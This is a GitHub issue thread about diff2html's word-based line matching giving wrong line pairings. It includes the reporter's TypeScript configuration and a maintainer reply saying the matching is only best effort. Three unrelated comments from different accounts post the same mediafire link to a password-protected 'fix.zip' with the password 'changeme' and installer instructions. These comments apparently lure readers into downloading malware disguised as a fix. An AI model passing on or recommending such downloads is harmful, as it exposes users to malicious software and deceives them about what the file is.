### ISSUE TITLE
Line similarity matching doesn't work well in some cases

### ISSUE THREAD

**Issue by rg11175** [rtfpessoa/diff2html#541]
### **Step 0: Describe your environment**

- OS: Windows11
- diff2html version: 3.4.22
- Using diff2html directly or using diff2html-ui helper: using diff2html-ui

### **Step 1: Describe the problem:**

for some cases, the line similarity matching logic is not correct to my compared files, look at the example below:
![image](https://github.com/user-attachments/assets/464c22cf-e15a-48de-b018-f097a27eb03a)

You can see that diff2html has matched line number 7787 on the left with line number 7792 on the right, while I expect it to match line 7787 on the right with line 7791 on the left, the match as it currently stands is incorrect to me

### here is my code:
`
            const configuration: Diff2HtmlUIConfig = {
              drawFileList: false,
              fileListToggle: false,
              fileListStartVisible: false,
              outputFormat: 'side-by-side',
              fileContentToggle: false,
              renderNothingWhenEmpty: true,
              matching: 'words',
              matchWordsThreshold: 1,
              stickyFileHeaders: true,
              highlightLanguages: new Map<string, string>(), 
              // TBD: abap format - check with Yuri how to implement,
              rawTemplates: {
                'tag-file-changed': '',
                'icon-file': '',
              },
              compiledTemplates: {
                'generic-file-path': Hogan.compile(
                  '<p class="p-paragraph-1 p-tpgr-bold program-name program-name-{{fileDiffName}}">{{ fileDiffName }}</p>'
                ) as Hogan.Template,
              },
            };

            const diffText = diff.createTwoFilesPatch(
              'file',
              'file',
              this.oldText,
              this.newText
            );

            const diff2htmlUi = new Diff2HtmlUI(
              targetElement,
              diffText,
              configuration
            );
            diff2htmlUi.draw();
            diff2htmlUi.highlightCode();
`

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rg11175** [comment]
I can't access this file, can you put here this file in another way?

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rtfpessoa** [comment]
This is a best effort using word similarity. You cannot expect this to have human level comparison. Not much can be done here.
Unless you have a better implementation you want to contribute, this is what we have.
